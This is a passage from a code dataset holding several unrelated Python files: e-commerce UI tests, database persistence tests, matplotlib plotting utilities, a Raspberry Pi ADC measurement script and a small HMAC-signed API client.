page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_not_product_added_to_basket()\n\n def test_guest_cant_see_success_message(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n # Assert\n page.is_not_product_added_to_basket()\n\n @pytest.mark.xfail\n def test_message_disappeared_after_adding_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_success_message_disappeared_after_adding_to_basket()\n\n def test_guest_cant_see_product_in_basket_opened_from_product_page(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.go_to_basket_by_button_in_header()\n basket_page = BasketPage(browser, browser.current_url)\n # Assert\n basket_page.basket_items_are_not_present()\n basket_page.basket_empty_text_is_present()\n\n\nclass TestUserAddToBasketFromProductPage:\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n page = ProductPage(browser, link)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n email = str(time.time()) + \"@fakemail.org\"\n password = str(time.time())\n login_page.register_new_user(email, password)\n login_page.should_be_authorized_user()\n\n @pytest.mark.xfail\n def 
test_user_cant_see_success_message_after_adding_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_not_product_added_to_basket()\n\n @pytest.mark.xfail\n def test_user_can_add_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_product_added_to_basket()\n","sub_path":"final/test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"619339764","text":"\n\nfrom xai.brain.wordbase.nouns._slugger import _SLUGGER\n\n# class header\nclass _SLUGGERS(_SLUGGER, ):\n\tdef __init__(self,): \n\t\t_SLUGGER.__init__(self)\n\t\tself.name = \"SLUGGERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"slugger\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sluggers.py","file_name":"_sluggers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203709637","text":"from unittest.mock import MagicMock\n\nimport pytest\nfrom option import Some\nimport os\nimport psycopg2\n\nfrom core.tests.generation.fake_course import fake_course, fake_section\nfrom core.presistence.course_persistence import CoursePresistence\nfrom core.presistence.instructor_persistence import InstructorPersistence\n\n\n@pytest.fixture()\ndef course_presistence() -> CoursePresistence:\n conn = psycopg2.connect(\n host=os.getenv(\"OHS_DB_HOST\"),\n dbname=os.getenv(\"OHS_DB_NAME\"),\n user=os.getenv(\"OHS_DB_USER\"),\n password=os.getenv(\"OHS_DB_PASSWORD\"),\n )\n yield CoursePresistence(lambda: conn)\n conn.close()\n\n\n@pytest.fixture()\ndef instructor_presistance() -> InstructorPersistence:\n conn = psycopg2.connect(\n host=os.getenv(\"OHS_DB_HOST\"),\n dbname=os.getenv(\"OHS_DB_NAME\"),\n user=os.getenv(\"OHS_DB_USER\"),\n password=os.getenv(\"OHS_DB_PASSWORD\"),\n )\n yield InstructorPersistence(lambda: conn)\n conn.close()\n\n\nclass TestCreateCourse:\n def test_success(self, course_presistence):\n course = fake_course()\n assert course_presistence.create_course(course).unwrap() == course\n assert course_presistence.get_course(course.course_code).unwrap() == course\n\n def test_duplicate(self, course_presistence):\n course = fake_course()\n course_presistence.get_course = MagicMock(return_value=Some(course))\n assert (\n course_presistence.create_course(course).unwrap_err()\n == f\"Course {course} already exists\"\n )\n\n\nclass TestCreateSection:\n def test_success(self, course_presistence, instructor_presistance):\n section = fake_section()\n course_presistence.create_course(section.course)\n instructor_presistance.create_instructor(section.taught_by, \"aaaaa\")\n assert course_presistence.create_section(section).unwrap() == section\n assert course_presistence.get_section(section.identity).unwrap() == section\n course_presistence.delete_section(section.identity)\n course_presistence.delete_course(section.course)\n instructor_presistance.delete_instructor(section.taught_by)\n\n def test_invalid_course(self, course_presistence):\n section = fake_section()\n assert (\n course_presistence.create_section(section).unwrap_err()\n == f\"Course {section.course} does not exist\"\n )\n assert course_presistence.get_section(section.identity).is_none\n\n def test_duplicate(self, 
course_presistence):\n section = fake_section()\n course_presistence.get_section = MagicMock(return_value=Some(section))\n assert (\n course_presistence.create_section(section).unwrap_err()\n == f\"Section {section} already exists\"\n )\n","sub_path":"backend/core/tests/presistence/test_course_presistence.py","file_name":"test_course_presistence.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174723093","text":"import os\nfrom enum import Enum\nfrom typing import List, Union, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nimport seaborn as sns\n\nfrom airl_2D_colormap import AIRL_ColorMap\n\n\nclass OptionsColor(Enum):\n COLORMAP = 0\n RGB = 1\n\n\nclass Components(Enum):\n GROUND_TRUTH = 0\n LATENT_COMPONENT = 1\n VALUE_FITNESS = 2\n VALUE_FITNESS_IMPLICIT = 3\n NOVELTY = 4\n\n\ndef read_data(file_path: str,\n list_names_components: List[str],\n convert_to_float_numpy_array: bool = True\n ) -> dict:\n dict_data_per_component = {name_data: [] for name_data in list_names_components}\n\n with open(file_path, 'r') as file:\n for line in file.readlines():\n list_different_components = filter(bool, line.split(' '))\n list_different_components = list(map(str.strip, list_different_components))\n list_different_components = [component.split(' ') for component in list_different_components]\n\n for index_component, name_component in enumerate(list_names_components):\n dict_data_per_component[name_component].append(list_different_components[index_component])\n\n try:\n if convert_to_float_numpy_array:\n for name_component in list_names_components:\n dict_data_per_component[name_component] = np.asarray(dict_data_per_component[name_component],\n dtype=np.float)\n except:\n dict_data_per_component = {name_data: np.asarray([]).reshape(0,len(dict_data_per_component[name_component][0])) for name_data in list_names_components}\n return dict_data_per_component\n\n\ndef project_axes(array: np.array, index_axes: Union[int, np.array]) -> np.array:\n if isinstance(index_axes, int):\n return array[:, index_axes]\n elif isinstance(index_axes, np.ndarray):\n return array.T[index_axes].T\n\n\ndef pca():\n # TODO\n pass\n\n\ndef save_figure(figure,\n name_without_format: str,\n list_formats: List[str]\n ) -> None:\n for _format in list_formats:\n figure.savefig(f\"{name_without_format}.{_format}\", format=_format)\n\n\ndef get_colors_array(option_color: OptionsColor,\n ground_truth_component: np.ndarray,\n indexes=None,\n ) -> np.ndarray:\n if not indexes:\n indexes = [0, 1, 2]\n if option_color == OptionsColor.COLORMAP:\n if ground_truth_component.shape[1] == 2:\n return AIRL_ColorMap.get_2D_colormap(ground_truth_component)\n elif ground_truth_component.shape[1] > 2:\n return AIRL_ColorMap.get_2D_colormap(ground_truth_component[:, np.array([indexes[0], indexes[1]])])\n elif option_color == OptionsColor.RGB:\n if ground_truth_component.shape[1] == 3:\n return convert_to_rgb(ground_truth_component)\n elif ground_truth_component.shape[1] > 3:\n return convert_to_rgb(ground_truth_component[:, np.array(indexes)])\n else:\n raise ValueError(\"option_color is supposed to be an instance of OptionsColor\")\n\n\ndef _create_joint_plot(name_saved_plot: str,\n data_frame,\n list_formats: List[str],\n show_plot: bool = False,\n do_put_title: bool = False\n ):\n sns.set(style=\"white\")\n\n hexplot = sns.jointplot(\"x\", \"y\", data=data_frame, kind=\"hex\", 
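The duplicate-detection tests above stub the lookup method with MagicMock so the "already exists" branch runs without touching the database. A self-contained sketch of that pattern (Repo and its methods are made-up stand-ins, not the project's classes):

from unittest.mock import MagicMock

class Repo:
    def get(self, key):
        return None  # the real version would query the database
    def create(self, key):
        if self.get(key) is not None:
            return f"{key} already exists"
        return "created"

repo = Repo()
repo.get = MagicMock(return_value="cached-row")  # force the duplicate branch
assert repo.create("cs101") == "cs101 already exists"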
joint_kws={})\n plt.subplots_adjust(right=0.8, left=0.2, top=0.8, bottom=0.2) # shrink fig so cbar is visible\n # make new ax object for the cbar\n cbar_ax = hexplot.fig.add_axes([0.85, .25, .05, .4]) # x, y, width, height\n plt.colorbar(cax=cbar_ax)\n\n figure = hexplot.fig\n\n if show_plot:\n plt.show()\n\n if do_put_title:\n figure.suptitle(name_saved_plot)\n\n save_figure(figure, name_saved_plot, list_formats) # TODO\n figure.clear()\n plt.cla()\n plt.clf()\n plt.close()\n\n\ndef _create_color_plot(path_saved_plot: str,\n data_frame: pd.DataFrame,\n ground_truth_component: np.ndarray,\n option_color: OptionsColor,\n list_formats: List[str],\n show_plot: bool = False,\n do_put_title: bool = False,\n indexes: tuple = None,\n ):\n if not indexes:\n indexes = (0, 1)\n sns.set(style=\"darkgrid\")\n color = sns.color_palette()[5]\n g = sns.jointplot(\"x\", \"y\", data=data_frame, kind=\"reg\", stat_func=None,\n color='k', height=7, xlim=(-np.pi - 0.1, np.pi + 0.1), ylim=(-np.pi - 0.1, np.pi + 0.1))\n g.ax_joint.cla()\n colors_array = get_colors_array(option_color, ground_truth_component, indexes=indexes)\n if np.max(colors_array) > 2:\n colors_array = colors_array / 255.\n for i, row in enumerate(data_frame.values):\n plt.plot(row[0], row[1], color=colors_array[i], marker='o')\n g.set_axis_labels('x', 'y', fontsize=16)\n if show_plot:\n plt.show()\n\n fig = g.fig\n\n if do_put_title:\n fig.suptitle(path_saved_plot)\n\n save_figure(fig, path_saved_plot, list_formats) # TODO\n fig.clear()\n plt.cla()\n plt.clf()\n plt.close()\n\n\ndef convert_to_rgb(dataset: np.ndarray, indexes_color_component, center=None, numpy_max=None, rank_based_coloring=True, max_l=None):\n assert len(indexes_color_component) in (2, 3)\n\n if len(indexes_color_component) == 2:\n rgb_color_component = AIRL_ColorMap.get_2D_colormap(dataset[:, np.array(list(indexes_color_component))], center=center, numpy_max=numpy_max, rank_based_coloring=rank_based_coloring, max_l=max_l)\n elif len(indexes_color_component) == 3:\n sub_component = dataset[:, np.array(list(indexes_color_component))]\n\n rgb_max = np.max(sub_component, axis=0)\n rgb_min = np.min(sub_component, axis=0)\n rgb_color_component = np.asarray(255 * (sub_component - rgb_min) / (rgb_max - rgb_min), dtype=np.int)\n else:\n raise ValueError\n\n list_str_colors = [\n f'rgb({rgb_color_component[i, 0]}, '\n f'{rgb_color_component[i, 1]}, '\n f'{rgb_color_component[i, 2]})' for i\n in range(rgb_color_component.shape[0])]\n\n return rgb_color_component, list_str_colors\n\n\ndef create_html_plot(path_saved_plot,\n plot_component: np.ndarray,\n color_component: np.ndarray,\n indexes_plot_component: tuple,\n indexes_color_component: tuple,\n compare_component:np.ndarray=None,\n latent_component:np.ndarray=None,\n compare_latent_component: np.ndarray=None,\n star=False,\n added_metric_component=None\n ):\n assert len(indexes_plot_component) in (2, 3)\n assert len(indexes_color_component) in (2, 3)\n\n rgb_color_component, list_str_colors = convert_to_rgb(color_component, indexes_color_component)\n\n if added_metric_component is None:\n dict_marker = dict(\n size=7,\n color=list_str_colors, # set color to an array/list of desired values\n opacity=1\n )\n else:\n dict_marker = dict(\n size=7,\n color=added_metric_component, # set color to an array/list of desired values\n opacity=1,\n colorscale='Viridis',\n colorbar=dict(thickness=20),\n cmin=0,\n cmax=400\n )\n\n if len(indexes_plot_component) == 3:\n fig = go.Figure(data=[go.Scatter3d(\n x=plot_component[:, 
indexes_plot_component[0]],\n y=plot_component[:, indexes_plot_component[1]],\n z=plot_component[:, indexes_plot_component[2]],\n text=[f'index: {index}' for index in np.arange(np.size(plot_component, axis=0))],\n mode='markers',\n marker=dict_marker\n )])\n elif len(indexes_plot_component) == 2:\n fig = go.Figure(data=[go.Scatter(\n x=plot_component[:, indexes_plot_component[0]],\n y=plot_component[:, indexes_plot_component[1]],\n text=[f'index: {index}' for index in np.arange(np.size(plot_component, axis=0))],\n mode='markers',\n marker=dict_marker\n )])\n else:\n raise ValueError\n if latent_component is not None:\n d = {}\n d_compare = {}\n X,Y,Z,color = [], [], [], []\n for i in range(np.size(latent_component, axis=0)):\n index_closer = np.argmin(np.linalg.norm(compare_latent_component - latent_component[i, :], axis=1), axis=0).item()\n # compare_point = compare_component[index_closer, :]\n # component_point = plot_component[index_closer, :]\n if index_closer not in d:\n d[index_closer] = [plot_component[i, :]]\n else:\n d[index_closer].append(plot_component[i, :])\n d_compare[index_closer] = compare_component[index_closer, :]\n # fig.add_shape(\n # # Line Diagonal\n # type=\"line\",\n # x0=compare_point[0],\n # y0=compare_point[1],\n # x1=component_point[0],\n # y1=component_point[1],\n # line=dict(\n # color=list_str_colors[index_closer],\n # width=4,\n # dash=\"dashdot\",\n # )\n # )\n for index_closer, list_neighbours in d.items():\n if len(list_neighbours) >= 20:\n for neighbour in list_neighbours:\n X.append(neighbour[indexes_plot_component[0]])\n Y.append(neighbour[indexes_plot_component[1]])\n Z.append(neighbour[indexes_plot_component[2]])\n color.append(str(index_closer))\n if star:\n X.append(d_compare[index_closer][indexes_plot_component[0]])\n Y.append(d_compare[index_closer][indexes_plot_component[1]])\n Z.append(d_compare[index_closer][indexes_plot_component[2]])\n color.append(str(index_closer))\n df = pd.DataFrame(dict(X=X, Y=Y, Z=Z, color=color))\n import plotly.express as px\n fig = px.line_3d(df, x='X', y='Y', z='Z', color=\"color\")\n # fig.update_shapes(dict(xref='x', yref='y'))\n try:\n print(f\"Saving new figure there: {path_saved_plot}.html\")\n fig.write_html(f\"{path_saved_plot}.html\")\n print(\"Saving Succeeded\")\n except:\n print(f\"Saving of {path_saved_plot} failed, maybe the file already exists\")\n\n\ndef get_data_proj(file_path_projected_archive: str) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n try:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH,\n Components.VALUE_FITNESS,\n Components.VALUE_FITNESS_IMPLICIT,\n Components.NOVELTY,\n ])\n implicit_fitness_component = dict_data_per_component[Components.VALUE_FITNESS_IMPLICIT] # TODO\n novelty_component = dict_data_per_component[Components.NOVELTY]\n\n except:\n try:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH,\n Components.VALUE_FITNESS,\n Components.NOVELTY,\n ])\n novelty_component = dict_data_per_component[Components.NOVELTY]\n\n implicit_fitness_component = np.zeros_like(novelty_component)\n except:\n try:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH,\n Components.VALUE_FITNESS,\n ])\n value_fitness_component = dict_data_per_component[Components.VALUE_FITNESS]\n\n 
implicit_fitness_component = np.zeros_like(value_fitness_component)\n novelty_component = np.zeros_like(value_fitness_component)\n except:\n # print(\"[ERROR] PROBLEM IN PROJ FILE: \", file_path_projected_archive)\n raise\n\n latent_component = dict_data_per_component[Components.LATENT_COMPONENT]\n ground_truth_component = dict_data_per_component[Components.GROUND_TRUTH]\n value_fitness_component = dict_data_per_component[Components.VALUE_FITNESS]\n\n return latent_component, \\\n ground_truth_component, \\\n implicit_fitness_component, \\\n novelty_component\n\n\n\ndef get_data_offspring(file_path_projected_archive: str) -> Tuple[np.ndarray, np.ndarray]:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH])\n latent_component = dict_data_per_component[Components.LATENT_COMPONENT]\n ground_truth_component = dict_data_per_component[Components.GROUND_TRUTH]\n return latent_component, \\\n ground_truth_component\n\n\ndef get_data_modifier(file_path_projected_archive: str) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"1\"])\n gen_component = dict_data_per_component['1'][:, 0]\n l_component = dict_data_per_component['1'][:, 1]\n pop_size_component = dict_data_per_component['1'][:, 2]\n\n gen_component_without_duplicates = gen_component\n l_component_without_duplicates = l_component\n pop_size_component_without_duplicates = pop_size_component\n\n for gen in set(gen_component.flatten()):\n index_gen = np.where(gen_component_without_duplicates == gen)[0]\n if index_gen.size > 1:\n gen_component_without_duplicates = np.delete(gen_component_without_duplicates, index_gen[:-1].astype(int), axis=0)\n l_component_without_duplicates = np.delete(l_component_without_duplicates, index_gen[:-1].astype(int), axis=0)\n pop_size_component_without_duplicates = np.delete(pop_size_component_without_duplicates, index_gen[:-1].astype(int), axis=0)\n\n return gen_component_without_duplicates, l_component_without_duplicates, pop_size_component_without_duplicates\n\n\ndef get_data_frame(component, dim):\n if dim == 2:\n return pd.DataFrame(component, columns=[\"x\", \"y\"])\n elif dim == 3:\n return pd.DataFrame(component, columns=[\"x\", \"y\", \"z\"])\n else:\n return pd.DataFrame(component)\n\n\ndef create_archive_figures(file_path_projected_archive: str,\n path_save: str,\n generation: int,\n list_formats: List[str],\n do_put_title: bool = False,\n show_plots: bool = False,\n exp: str = '',\n ) -> None:\n if exp:\n prefix_exp = f\"{exp}_\"\n else:\n prefix_exp = \"\"\n\n latent_component, ground_truth_component, *_ = get_data_proj(file_path_projected_archive)\n # ground_truth_component = project_axes(ground_truth_component, np.array([0, 1]))\n # ground_truth_component = np.hstack((ground_truth_component, np.random.rand(ground_truth_component.shape[0]).reshape((-1, 1))))\n\n if ground_truth_component.shape[1] == 2:\n df_latent = get_data_frame(latent_component, dim=2)\n df_ground_truth = get_data_frame(ground_truth_component, dim=2)\n\n _create_color_plot(path_saved_plot=os.path.join(path_save, f\"archive_desc_gen_{generation:07}\"),\n data_frame=df_latent,\n latent_component=latent_component,\n ground_truth_component=ground_truth_component,\n option_color=OptionsColor.COLORMAP,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n _create_color_plot(path_saved_plot=os.path.join(path_save, 
f\"archive_gt_gen_{generation:07}\"),\n data_frame=df_ground_truth,\n latent_component=latent_component,\n ground_truth_component=ground_truth_component,\n option_color=OptionsColor.COLORMAP,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n _create_joint_plot(name_saved_plot=os.path.join(path_save, f\"archive_desc_joint_plot_gen_{generation:07}\"),\n data_frame=df_latent,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n _create_joint_plot(\n name_saved_plot=os.path.join(path_save, f\"archive_ground_truth_joint_plot_gen_{generation:07}\"),\n data_frame=df_ground_truth,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n elif ground_truth_component.shape[1] >= 3:\n print(latent_component)\n # reducer = umap.UMAP(n_components=3)\n # embedding = reducer.fit_transform(latent_component)\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_rot_gen_{generation:07}\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(3, 4, 5),\n indexes_color_component=(0, 1, 2),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_rot_gen_{generation:07}_comp\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(0, 1, 2),\n indexes_color_component=(0, 1, 2),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_pos_gen_{generation:07}\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(0, 1, 2),\n indexes_color_component=(3, 4, 5),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_pos_gen_{generation:07}_comp\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(3, 4, 5),\n indexes_color_component=(3, 4, 5),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_pos_gen_{generation:07}_test\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(3, 4),\n indexes_color_component=(0, 1),\n )\n\n # create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}latent_gen_{generation:07}\"),\n # plot_component=embedding,\n # color_component=ground_truth_component,\n # indexes_plot_component=(0, 1, 2),\n # indexes_color_component=(3, 4),\n # )\n\n\nif __name__ == '__main__':\n # create_archive_figures(\"example/proj_1900.dat\",\n # \"images/\",\n # generation=1900,\n # list_formats=[\"png\"])\n latent_aurora, gt_aurora, *_ = get_data_proj('/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/proj_5000_aurora.dat')\n latent_ns, gt_ns, *_ = get_data_proj('/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/proj_5000_ns.dat')\n create_html_plot(\"/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/plot_rot\",\n plot_component=gt_ns,\n color_component=gt_ns,\n indexes_plot_component=(3, 4, 5),\n indexes_color_component=(3, 4, 5),\n latent_component=latent_ns,\n compare_latent_component=latent_aurora,\n compare_component=gt_aurora,\n )\n\n create_html_plot(\"/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/plot_pos\",\n plot_component=gt_ns,\n color_component=gt_ns,\n indexes_plot_component=(0, 1, 2),\n indexes_color_component=(0, 1, 2),\n latent_component=latent_ns,\n 
compare_latent_component=latent_aurora,\n compare_component=gt_aurora,\n star=True,\n )\n","sub_path":"submodules/figure_generator/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":22361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635549728","text":"import RPi.GPIO as GPIO\nimport time\nimport matplotlib.pyplot as plt\nimport numpy\n\n\nTroikaModulePin = 17\nComparePin = 4\nDAC = (26, 19, 13, 6, 5, 11, 9, 10)\nLEDS = (21, 20, 16, 12, 7, 8, 25, 24)\n\nMAX_VOLTAGE = 3.3 #V\n\ndef num2pins(pins, num):\n for i in range(7, -1, -1):\n GPIO.output(pins[i], num % 2)\n num //= 2\n\ndef adc():\n start = 0; end = 255\n while start <= end:\n mid = (start + end) // 2\n num2pins(DAC, mid)\n time.sleep(0.0003)\n if GPIO.input(ComparePin) == 0:\n end = mid - 1\n else:\n start = mid + 1\n \n if end < 0:\n print(start)\n return start\n else:\n print(end)\n return end\n\ndef analog(digital_voltage):\n return MAX_VOLTAGE * digital_voltage / 255\n\n\ntry:\n\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(TroikaModulePin, GPIO.OUT)\n GPIO.setup(ComparePin, GPIO.IN)\n GPIO.setup(DAC, GPIO.OUT)\n GPIO.setup(LEDS, GPIO.OUT)\n\n measurements = [] # [ (time0, volt0), (time1, volt1), ...]\n voltage = 0\n raw = []\n\n GPIO.output(TroikaModulePin, 0)\n time.sleep(0.1)\n\n START_TIME = time.time()\n GPIO.output(TroikaModulePin, 1)\n\n while voltage < 250:\n voltage = adc()\n raw.append(voltage)\n measurements.append((time.time() - START_TIME, analog(voltage)))\n time.sleep(0.002)\n\n GPIO.output(TroikaModulePin, 0)\n while voltage > 3:\n voltage = adc()\n raw.append(voltage)\n measurements.append((time.time() - START_TIME, analog(voltage)))\n time.sleep(0.002)\n\n numpy.savetxt('data.txt', raw, fmt='%d')\n\n dT = 0\n for i in range(1, len(measurements)):\n dT += measurements[i][0] - measurements[i-1][0]\n dT /= len(measurements) - 1\n dV = MAX_VOLTAGE / 255\n\n with open(\"settings.txt\", \"w\") as settings:\n settings.write(str(dT)+\"\\n\"+str(dV))\n\n plt.plot([measure[0] for measure in measurements], \n [measure[1] for measure in measurements])\n\n plt.title('U(t)')\n plt.xlabel('Время, с')\n plt.ylabel('Напряжение, В')\n plt.show()\n\n\nfinally:\n\n GPIO.cleanup()\n\n\n\n\n","sub_path":"ADC/caraciptor.py","file_name":"caraciptor.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145702650","text":"import hashlib\nimport hmac\nimport urllib2\n\ntry:\n import json\nexcept:\n import simplejson as json\n\nfrom models import *\n\nTLDR_ENDPOINT = \"http://a.thoughtleadr.com/v2/\"\n\nclass ThoughtLeadrClient(object):\n\n def __init__(self, public_key, private_key):\n self.site = public_key\n self.pk = private_key\n self.endpoint = \"%s%s\" % (TLDR_ENDPOINT, self.site)\n\n def get_ad(self, ad_id, debug=False):\n ad = None\n #try:\n result = self.fetch(\"ad/%s?debug=%s\" % (ad_id, self.py_bool_2_js(debug)))\n ad = Ad(result)\n #except Exception, e:\n # print e\n return ad\n\n def py_bool_2_js(self, answer):\n if answer:\n return \"true\"\n return \"false\"\n\n def fetch(self, url):\n req = self.make_request(url)\n opener = urllib2.build_opener()\n f = opener.open(req)\n json_data = json.load(f)\n return json_data\n\n def make_request(self, url):\n full_url = \"%s/%s\" % (self.endpoint, url)\n req = urllib2.Request(full_url)\n signature = self.auth(\"/v2/%s/%s\" % (self.site, url))\n req.add_header(\"Authorization\", signature)\n return req\n\n def 
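The adc() routine in caraciptor.py above is a successive-approximation converter: it binary-searches the 8-bit DAC code at which the comparator flips. A software-only sketch of the same search, with compare() standing in for GPIO.input(ComparePin) so no Raspberry Pi is needed (the names and the sample threshold are illustrative):

def sar_adc(compare):
    # Binary-search the smallest 8-bit code whose DAC output trips the comparator.
    start, end = 0, 255
    while start <= end:
        mid = (start + end) // 2
        if compare(mid):          # comparator low in the record: DAC output >= input
            end = mid - 1
        else:
            start = mid + 1
    return max(start, 0)

true_code = 173
print(sar_adc(lambda code: code >= true_code))  # -> 173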
auth(self, msg):\n dig = hmac.new(self.pk, msg=msg, digestmod=hashlib.sha256).hexdigest()\n return dig\n\n\n","sub_path":"tldr/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"176767827","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn-white')\n\ndata = np.random.randn(1000)\n# plt.hist(data)\n# plt.show()\n\n\n# plt.hist(data, bins=30, normed=True, alpha=0.5,\n# histtype='stepfilled', color='steelblue',\n# edgecolor='none')\n\n# plt.show()\n\nx1 = np.random.normal(0, 0.8, 1000)\nx2 = np.random.normal(-2, 1, 1000)\nx3 = np.random.normal(3, 2, 1000)\n\nkwargs = dict(histtype='stepfilled', alpha=0.3, normed=True, bins=40)\n\nplt.hist(x1, hatch='/', **kwargs)\nplt.hist(x2, **kwargs)\nplt.hist(x3, **kwargs)\nplt.show()","sub_path":"plotlib/hist/hist_stepfilled.py","file_name":"hist_stepfilled.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476142784","text":"import matplotlib.lines as mlines\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom visualize.helpers.data import filter_data, get_values, sort_data, load_pickles, load_pickle\nfrom visualize.helpers.plot import interpolate_plot, markers, save_file, set_plot\nfrom visualize.helpers.colors import color2\nfrom analyze.defines import REACTOR_GLASS_SHORT_QUAD\n\ndef plot_inv_ppm(data_nor, data_inv):\n \"\"\"\n Plot ppm to inverted reactor\n\n :param data: NOT USED\n :param reactor: long or short glass reactor\n :return:\n \"\"\"\n fig, (ax_ppm, ax_yield) = plt.subplots(2, 1, sharex=True)\n for i, d in enumerate([data_nor, data_inv]):\n m = markers[i]\n c=color2[i]\n x = get_values(d, key='input_f')\n ux = sorted(np.unique(x))\n y = get_values(d, 'o3_ppm')\n y2 = get_values(d, 'output_yield_gkwh')\n z2 = get_values(d, 'output_yield_gkwh_single')\n uz2 = [] # combined version of z2\n uy2 = []\n uy = []\n for uxa in ux:\n ind = [True if a==uxa else False for a in x ]\n d = z2[ind] # list of lists of all single data points for 'uxa'\n uz2a = ([item for sublist in d for item in sublist]) # flattened version of d, list of all single data.\n uy2a = np.mean(uz2a)\n uya = np.mean(y[ind])\n # average should be equal to average of averages:\n print(uy2/np.mean(y2[ind]))\n uy2.append(uy2a)\n uz2.append(uz2a)\n uy.append(uya)\n\n interpolate_plot(ax_yield, ux, uy2)\n interpolate_plot(ax_ppm, ux, uy)\n for xa, ya, y2a in zip(ux, uy, uy2):\n ax_ppm.scatter(xa, ya, c=c, marker=m)\n ax_yield.scatter(xa, y2a, c=c, marker=m)\n\n # mi = [y2a - min(z2a) for z2a, y2a in zip(uz2, uy2)]\n # ma = [max(z2a) - y2a for z2a, y2a in zip(uz2, uy2)]\n std = []\n for z2a in uz2:\n std.append(np.std(z2a))\n # std = np.std(z2, 1) # list of minima of y\n ax_yield.errorbar(ux, uy2, yerr=std, xerr=None, ecolor=c, fmt='none', capsize=3)\n\n marker_legends = [\n (mlines.Line2D([], [], marker=markers[0], label='Normal', color='grey', markerfacecolor=color2[0], markeredgewidth=0)),\n (mlines.Line2D([], [], marker=markers[1], label='Inverted', color='grey', markerfacecolor=color2[1], markeredgewidth=0)),\n ]\n\n ax_ppm.set_ylabel('Ozone [ppm]')\n ax_yield.set_ylabel('Yield [g/kWh]')\n ax_yield.set_xlabel('Frequency [Hz]')\n plt.legend(handles=marker_legends)\n set_plot(fig, plot_height=1.9)\n save_file(fig, name='inv-ppm', path='plots_final_v2/normal')\n\n\nif __name__ == '__main__':\n datas = 
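The auth() method above signs the request path with HMAC-SHA256 and sends the hex digest as the Authorization header. The record targets Python 2 (urllib2); a Python 3 sketch of the same signing step, with made-up key and path values:

import hashlib
import hmac

def sign(private_key: bytes, path: str) -> str:
    # HMAC-SHA256 over the URL path, keyed with the API private key
    return hmac.new(private_key, msg=path.encode(), digestmod=hashlib.sha256).hexdigest()

print(sign(b"secret-key", "/v2/site-id/ad/42"))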
